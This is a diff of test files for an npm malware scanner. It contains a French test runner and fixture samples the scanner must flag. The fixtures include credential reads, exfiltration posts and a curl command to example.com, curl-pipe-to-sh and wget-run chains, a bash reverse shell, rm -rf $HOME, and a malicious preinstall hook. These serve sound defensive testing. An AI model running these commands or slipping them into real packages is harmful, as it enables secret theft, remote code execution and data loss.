muaddib-scanner 1.0.0

package/tests/run-tests.js

@@ -0,0 +1,363 @@
+const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
+
+const TESTS_DIR = path.join(__dirname, 'samples');
+const BIN = path.join(__dirname, '..', 'bin', 'muaddib.js');
+
+let passed = 0;
+let failed = 0;
+const failures = [];
+
+function test(name, fn) {
+  try {
+    fn();
+    console.log(`[PASS] ${name}`);
+    passed++;
+  } catch (e) {
+    console.log(`[FAIL] ${name}`);
+    console.log(`       ${e.message}`);
+    failures.push({ name, error: e.message });
+    failed++;
+  }
+}
+
+function assert(condition, message) {
+  if (!condition) {
+    throw new Error(message || 'Assertion failed');
+  }
+}
+
+function assertIncludes(str, substr, message) {
+  if (!str.includes(substr)) {
+    throw new Error(message || `Expected "${substr}" in output`);
+  }
+}
+
+function assertNotIncludes(str, substr, message) {
+  if (str.includes(substr)) {
+    throw new Error(message || `Unexpected "${substr}" in output`);
+  }
+}
+
+function runScan(target, options = '') {
+  try {
+    const cmd = `node "${BIN}" scan "${target}" ${options}`;
+    return execSync(cmd, { encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'] });
+  } catch (e) {
+    return e.stdout || e.stderr || '';
+  }
+}
+
+function runCommand(cmd) {
+  try {
+    return execSync(`node "${BIN}" ${cmd}`, { encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'] });
+  } catch (e) {
+    return e.stdout || e.stderr || '';
+  }
+}
+
+// ============================================
+// TESTS UNITAIRES - DETECTION AST
+// ============================================
+
+console.log('\n=== TESTS AST ===\n');
+
+test('AST: Detecte acces .npmrc', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, '.npmrc', 'Devrait detecter .npmrc');
+});
+
+test('AST: Detecte acces .ssh', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, '.ssh', 'Devrait detecter .ssh');
+});
+
+test('AST: Detecte GITHUB_TOKEN', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'GITHUB_TOKEN', 'Devrait detecter GITHUB_TOKEN');
+});
+
+test('AST: Detecte NPM_TOKEN', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'NPM_TOKEN', 'Devrait detecter NPM_TOKEN');
+});
+
+test('AST: Detecte AWS_SECRET', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'AWS_SECRET', 'Devrait detecter AWS_SECRET');
+});
+
+test('AST: Detecte eval()', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'eval', 'Devrait detecter eval');
+});
+
+test('AST: Detecte exec()', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'exec', 'Devrait detecter exec');
+});
+
+test('AST: Detecte spawn()', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'spawn', 'Devrait detecter spawn');
+});
+
+test('AST: Detecte new Function()', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'));
+  assertIncludes(output, 'Function', 'Devrait detecter Function');
+});
+
+// ============================================
+// TESTS UNITAIRES - DETECTION SHELL
+// ============================================
+
+console.log('\n=== TESTS SHELL ===\n');
+
+test('SHELL: Detecte curl | sh', () => {
+  const output = runScan(path.join(TESTS_DIR, 'shell'));
+  assertIncludes(output, 'curl', 'Devrait detecter curl | sh');
+});
+
+test('SHELL: Detecte wget && chmod +x', () => {
+  const output = runScan(path.join(TESTS_DIR, 'shell'));
+  assertIncludes(output, 'wget', 'Devrait detecter wget');
+});
+
+test('SHELL: Detecte reverse shell', () => {
+  const output = runScan(path.join(TESTS_DIR, 'shell'));
+  assertIncludes(output, 'reverse', 'Devrait detecter reverse shell');
+});
+
+test('SHELL: Detecte rm -rf $HOME', () => {
+  const output = runScan(path.join(TESTS_DIR, 'shell'));
+  assertIncludes(output, 'home', 'Devrait detecter suppression home');
+});
+
+// ============================================
+// TESTS UNITAIRES - DETECTION OBFUSCATION
+// ============================================
+
+console.log('\n=== TESTS OBFUSCATION ===\n');
+
+test('OBFUSCATION: Detecte hex escapes massifs', () => {
+  const output = runScan(path.join(TESTS_DIR, 'obfuscation'));
+  assertIncludes(output, 'obfusc', 'Devrait detecter obfuscation');
+});
+
+test('OBFUSCATION: Detecte variables _0x', () => {
+  const output = runScan(path.join(TESTS_DIR, 'obfuscation'));
+  assertIncludes(output, 'obfusc', 'Devrait detecter variables _0x');
+});
+
+// ============================================
+// TESTS UNITAIRES - DETECTION DATAFLOW
+// ============================================
+
+console.log('\n=== TESTS DATAFLOW ===\n');
+
+test('DATAFLOW: Detecte credential read + network send', () => {
+  const output = runScan(path.join(TESTS_DIR, 'dataflow'));
+  assertIncludes(output, 'Flux suspect', 'Devrait detecter flux suspect');
+});
+
+test('DATAFLOW: Detecte env read + fetch', () => {
+  const output = runScan(path.join(TESTS_DIR, 'dataflow'));
+  assertIncludes(output, 'CRITICAL', 'Devrait etre CRITICAL');
+});
+
+// ============================================
+// TESTS UNITAIRES - DETECTION PACKAGE.JSON
+// ============================================
+
+console.log('\n=== TESTS PACKAGE.JSON ===\n');
+
+test('PACKAGE: Detecte preinstall suspect', () => {
+  const output = runScan(path.join(TESTS_DIR, 'package'));
+  assertIncludes(output, 'preinstall', 'Devrait detecter preinstall');
+});
+
+test('PACKAGE: Detecte postinstall suspect', () => {
+  const output = runScan(path.join(TESTS_DIR, 'package'));
+  assertIncludes(output, 'postinstall', 'Devrait detecter postinstall');
+});
+
+// ============================================
+// TESTS UNITAIRES - DETECTION MARQUEURS
+// ============================================
+
+console.log('\n=== TESTS MARQUEURS ===\n');
+
+test('MARQUEURS: Detecte Shai-Hulud', () => {
+  const output = runScan(path.join(TESTS_DIR, 'markers'));
+  assertIncludes(output, 'Shai-Hulud', 'Devrait detecter marqueur Shai-Hulud');
+});
+
+test('MARQUEURS: Detecte The Second Coming', () => {
+  const output = runScan(path.join(TESTS_DIR, 'markers'));
+  assertIncludes(output, 'Second Coming', 'Devrait detecter marqueur The Second Coming');
+});
+
+// ============================================
+// TESTS INTEGRATION - CLI
+// ============================================
+
+console.log('\n=== TESTS CLI ===\n');
+
+test('CLI: --help affiche usage', () => {
+  const output = runCommand('');
+  assertIncludes(output, 'Usage', 'Devrait afficher usage');
+});
+
+test('CLI: --json retourne JSON valide', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'), '--json');
+  try {
+    JSON.parse(output);
+  } catch (e) {
+    throw new Error('Output JSON invalide');
+  }
+});
+
+test('CLI: --sarif genere fichier SARIF', () => {
+  const sarifPath = path.join(__dirname, 'test-output.sarif');
+  runScan(path.join(TESTS_DIR, 'ast'), `--sarif "${sarifPath}"`);
+  assert(fs.existsSync(sarifPath), 'Fichier SARIF non genere');
+  const content = fs.readFileSync(sarifPath, 'utf8');
+  const sarif = JSON.parse(content);
+  assert(sarif.version === '2.1.0', 'Version SARIF incorrecte');
+  assert(sarif.runs && sarif.runs.length > 0, 'SARIF runs manquant');
+  fs.unlinkSync(sarifPath);
+});
+
+test('CLI: --html genere fichier HTML', () => {
+  const htmlPath = path.join(__dirname, 'test-output.html');
+  runScan(path.join(TESTS_DIR, 'ast'), `--html "${htmlPath}"`);
+  assert(fs.existsSync(htmlPath), 'Fichier HTML non genere');
+  const content = fs.readFileSync(htmlPath, 'utf8');
+  assertIncludes(content, 'MUAD', 'HTML devrait contenir MUAD');
+  assertIncludes(content, '<table>', 'HTML devrait contenir table');
+  fs.unlinkSync(htmlPath);
+});
+
+test('CLI: --explain affiche details', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
+  assertIncludes(output, 'Rule ID', 'Devrait afficher Rule ID');
+  assertIncludes(output, 'MITRE', 'Devrait afficher MITRE');
+  assertIncludes(output, 'References', 'Devrait afficher References');
+  assertIncludes(output, 'Playbook', 'Devrait afficher Playbook');
+});
+
+test('CLI: --fail-on critical exit code correct', () => {
+  try {
+    execSync(`node "${BIN}" scan "${path.join(TESTS_DIR, 'dataflow')}" --fail-on critical`, { encoding: 'utf8' });
+  } catch (e) {
+    assert(e.status === 1, 'Exit code devrait etre 1 pour 1 CRITICAL');
+    return;
+  }
+  throw new Error('Devrait avoir exit code non-zero');
+});
+
+test('CLI: --fail-on high exit code correct', () => {
+  try {
+    execSync(`node "${BIN}" scan "${path.join(TESTS_DIR, 'ast')}" --fail-on high`, { encoding: 'utf8' });
+  } catch (e) {
+    assert(e.status > 0, 'Exit code devrait etre > 0');
+    return;
+  }
+  throw new Error('Devrait avoir exit code non-zero');
+});
+
+// ============================================
+// TESTS INTEGRATION - UPDATE
+// ============================================
+
+console.log('\n=== TESTS UPDATE ===\n');
+
+test('UPDATE: Telecharge et cache IOCs', () => {
+  const output = runCommand('update');
+  assertIncludes(output, 'IOCs sauvegardes', 'Devrait sauvegarder IOCs');
+  assertIncludes(output, 'packages malveillants', 'Devrait afficher nombre packages');
+});
+
+// ============================================
+// TESTS FAUX POSITIFS
+// ============================================
+
+console.log('\n=== TESTS FAUX POSITIFS ===\n');
+
+test('FAUX POSITIFS: Projet propre = aucune menace', () => {
+  const output = runScan(path.join(TESTS_DIR, 'clean'));
+  assertIncludes(output, 'Aucune menace', 'Projet propre ne devrait pas avoir de menaces');
+});
+
+test('FAUX POSITIFS: Commentaires ignores', () => {
+  const output = runScan(path.join(TESTS_DIR, 'clean'));
+  assertNotIncludes(output, 'CRITICAL', 'Commentaires ne devraient pas declencher');
+});
+
+// ============================================
+// TESTS EDGE CASES
+// ============================================
+
+console.log('\n=== TESTS EDGE CASES ===\n');
+
+test('EDGE: Fichier vide ne crash pas', () => {
+  const output = runScan(path.join(TESTS_DIR, 'edge', 'empty'));
+  assert(output !== undefined, 'Ne devrait pas crasher sur fichier vide');
+});
+
+test('EDGE: Fichier non-JS ignore', () => {
+  const output = runScan(path.join(TESTS_DIR, 'edge', 'non-js'));
+  assertIncludes(output, 'Aucune menace', 'Fichiers non-JS ignores');
+});
+
+test('EDGE: Syntaxe JS invalide ne crash pas', () => {
+  const output = runScan(path.join(TESTS_DIR, 'edge', 'invalid-syntax'));
+  assert(output !== undefined, 'Ne devrait pas crasher sur syntaxe invalide');
+});
+
+test('EDGE: Tres gros fichier ne timeout pas', () => {
+  const start = Date.now();
+  runScan(path.join(TESTS_DIR, 'edge', 'large-file'));
+  const duration = Date.now() - start;
+  assert(duration < 30000, 'Ne devrait pas prendre plus de 30s');
+});
+
+// ============================================
+// TESTS REGLES MITRE
+// ============================================
+
+console.log('\n=== TESTS MITRE ===\n');
+
+test('MITRE: T1552.001 - Credentials in Files', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
+  assertIncludes(output, 'T1552.001', 'Devrait mapper T1552.001');
+});
+
+test('MITRE: T1059 - Command Execution', () => {
+  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
+  assertIncludes(output, 'T1059', 'Devrait mapper T1059');
+});
+
+test('MITRE: T1041 - Exfiltration', () => {
+  const output = runScan(path.join(TESTS_DIR, 'dataflow'), '--explain');
+  assertIncludes(output, 'T1041', 'Devrait mapper T1041');
+});
+
+// ============================================
+// RESULTATS
+// ============================================
+
+console.log('\n========================================');
+console.log(`RESULTATS: ${passed} passes, ${failed} echecs`);
+console.log('========================================\n');
+
+if (failures.length > 0) {
+  console.log('Echecs:');
+  failures.forEach(f => {
+    console.log(`  - ${f.name}: ${f.error}`);
+  });
+  console.log('');
+}
+
+process.exit(failed > 0 ? 1 : 0);

package/tests/samples/ast/malicious.js

@@ -0,0 +1,20 @@
+const fs = require('fs');
+const { exec, spawn } = require('child_process');
+
+// Test credentials access
+const npmrc = fs.readFileSync('.npmrc', 'utf8');
+const ssh = fs.readFileSync('.ssh/id_rsa', 'utf8');
+
+// Test env access
+const token = process.env.GITHUB_TOKEN;
+const npmToken = process.env.NPM_TOKEN;
+const awsSecret = process.env.AWS_SECRET;
+
+// Test dangerous calls
+eval('console.log("evil")');
+new Function('return this')();
+exec('ls -la');
+spawn('node', ['script.js']);
+
+// Test API reference
+fetch('https://api.github.com/user');

package/tests/samples/clean/safe.js

@@ -0,0 +1,14 @@
+// Code normal sans menaces
+const express = require('express');
+const app = express();
+
+app.get('/', (req, res) => {
+  res.send('Hello World');
+});
+
+app.listen(3000, () => {
+  console.log('Server running on port 3000');
+});
+
+// Commentaire mentionnant .npmrc pour test faux positif
+// On ne devrait pas detecter: .npmrc, GITHUB_TOKEN, eval

package/tests/samples/dataflow/exfiltration.js

@@ -0,0 +1,20 @@
+const fs = require('fs');
+const https = require('https');
+
+// Lecture credentials
+const npmrc = fs.readFileSync('.npmrc', 'utf8');
+const token = process.env.GITHUB_TOKEN;
+
+// Envoi reseau
+fetch('https://example.com/collect', {
+  method: 'POST',
+  body: JSON.stringify({ npmrc, token })
+});
+
+// Variante avec request
+const request = require('request');
+request.post('https://example.com/exfil', { body: npmrc });
+
+// Variante avec exec curl
+const { exec } = require('child_process');
+exec(`curl -X POST -d "${token}" https://example.com/steal`);

package/tests/samples/edge/invalid-syntax/broken.js

@@ -0,0 +1,5 @@
+function broken( {
+  const x = 
+  if (true
+    console.log("syntax error"
+}

package/tests/samples/edge/large-file/large.js

@@ -0,0 +1,6 @@
+// Large file test
+const data = [];
+for (let i = 0; i < 100000; i++) {
+  data.push({ id: i, value: Math.random() });
+}
+console.log(data.length);

package/tests/samples/edge/non-js/readme.txt

@@ -0,0 +1,3 @@
+This is a text file.
+GITHUB_TOKEN should not be detected here.
+eval() should not trigger.

package/tests/samples/markers/shai-hulud.js

@@ -0,0 +1,10 @@
+// Shai-Hulud worm marker
+const version = "The Second Coming";
+const author = "Goldox-T3chs";
+
+// Payload
+function infect() {
+  console.log("Shai-Hulud was here");
+}
+
+infect();

package/tests/samples/obfuscation/obfuscated.js

@@ -0,0 +1 @@
+var _0x1234=['log','Hello'];var _0x5678=function(_0x1234ab){return _0x1234[_0x1234ab];};console[_0x5678(0)](_0x5678(1));var _0xabcd='\x65\x76\x61\x6c';var _0xef01='\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x6c\x6f\x67\x28\x22\x68\x61\x63\x6b\x65\x64\x22\x29';window[_0xabcd](_0xef01);var _0x9876=['\x72\x65\x61\x64\x46\x69\x6c\x65\x53\x79\x6e\x63','\x2e\x6e\x70\x6d\x72\x63'];require('\x66\x73')[_0x9876[0]](_0x9876[1]);(function(_0x2341,_0x5432){var _0x1111=function(_0x2222){while(--_0x2222){_0x2341['push'](_0x2341['shift']());}};_0x1111(++_0x5432);}([],0x1ff));var _0xaaaa=atob('ZXZhbCgiY29uc29sZS5sb2coJ293bmVkJykiKQ==');eval(_0xaaaa);

package/tests/samples/package/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "malicious-package",
+  "version": "1.0.0",
+  "scripts": {
+    "preinstall": "curl https://example.com/payload.sh | sh",
+    "postinstall": "node -e \"require('child_process').exec('whoami')\"",
+    "install": "echo $NPM_TOKEN | base64"
+  }
+}

package/tests/samples/shell/malicious.sh

@@ -0,0 +1,13 @@
+#!/bin/bash
+
+# Test curl | sh
+curl https://example.com/script.sh | sh
+
+# Test wget
+wget https://example.com/payload && chmod +x payload && ./payload
+
+# Test reverse shell
+bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
+
+# Test dead man's switch
+rm -rf $HOME